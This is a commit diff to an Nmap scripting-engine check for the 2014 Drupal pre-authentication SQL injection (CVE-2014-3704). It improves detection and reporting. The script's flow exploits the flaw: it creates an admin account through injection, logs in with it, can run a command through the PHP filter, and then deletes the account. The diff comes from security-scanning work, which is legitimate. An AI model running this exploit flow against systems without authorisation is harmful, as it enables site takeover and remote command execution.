Improves detection of cve-2014-3704. Fixes #902. Closes #905.

scripts/http-vuln-cve2014-3704.nse

@@ -216,9 +216,11 @@ local function do_sql_query(host, port, uri, user)
     }
   }
   local res = http.post(host, port, uri .. "?q=/user/login", opt, nil, r)
-  --TODO: Check return status
 
-  return user, passwd
+  if string.match(res.body, "includes[\\/]database[\\/]database%.inc") and string.match(res.body, "addcslashes%(%)") then
+    return user, passwd
+  end
+
 end
 
 local function set_php_filter(host, port, uri, session, disable)
@@ -342,9 +344,37 @@ action = function(host, port)
     cleanup = "false"
   end
 
+  local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
+  local vuln = {
+    title = 'Drupal - pre Auth SQL Injection Vulnerability',
+    state = vulns.STATE.NOT_VULN,
+    description = [[
+  The expandArguments function in the database abstraction API in
+  Drupal core 7.x before 7.32 does not properly construct prepared
+  statements, which allows remote attackers to conduct SQL injection
+  attacks via an array containing crafted keys.
+    ]],
+    IDS = {CVE = 'CVE-2014-3704'},
+    references = {
+      'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html',
+      'https://www.drupal.org/SA-CORE-2014-005',
+      'http://www.securityfocus.com/bid/70595',
+    },
+    dates = {
+      disclosure = {year = '2014', month = '10', day = '15'},
+    },
+  }
+
   local user, passwd = do_sql_query(host, port, uri, nil)
 
+  if user == nil or passwd == nil then
+    return vulnReport:make_output(vuln)
+  end
+
   stdnse.debug(1, string.format("logging in as admin user (username: '%s'; passwd: '%s')", user, passwd))
+
+  vuln.state = vulns.STATE.EXPLOIT
+
   local data = {
     ['name'] = user,
     ['pass'] = passwd,
@@ -355,28 +385,8 @@ action = function(host, port)
   local res = http.post(host, port, uri .. "?q=/user/login", nil, nil, data)
 
   if res.status == 302 and res.cookies[1].name ~= nil then
-    local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
+
-    local vuln = {
-      title = 'Drupal - pre Auth SQL Injection Vulnerability',
-      state = vulns.STATE.NOT_VULN,
-      description = [[
-The expandArguments function in the database abstraction API in
-Drupal core 7.x before 7.32 does not properly construct prepared
-statements, which allows remote attackers to conduct SQL injection
-attacks via an array containing crafted keys.
-      ]],
-      IDS = {CVE = 'CVE-2014-3704'},
-      references = {
-        'https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html',
-        'https://www.drupal.org/SA-CORE-2014-005',
-        'http://www.securityfocus.com/bid/70595',
-      },
-      dates = {
-        disclosure = {year = '2014', month = '10', day = '15'},
-      },
-    }
     stdnse.debug(1, string.format("logged in as admin user (username: '%s'; passwd: '%s'). Target is vulnerable.", user, passwd))
-    vuln.state = vulns.STATE.EXPLOIT
 
     if cmd ~= nil then
       local session = {}
@@ -406,11 +416,16 @@ attacks via an array containing crafted keys.
       end
     end
 
-    -- cleanup: remove admin user
+  else
-    if cleanup == nil then
+    vuln.state = vulns.STATE.LIKELY_VULN
-      do_sql_query(host, port, uri, user)
+    vuln.check_results = "Account created but unable to log in."
-    end
-
-    return vulnReport:make_output(vuln)
   end
+
+  -- cleanup: remove admin user
+  if cleanup == nil then
+    do_sql_query(host, port, uri, user)
+  end
+
+  return vulnReport:make_output(vuln)
+
 end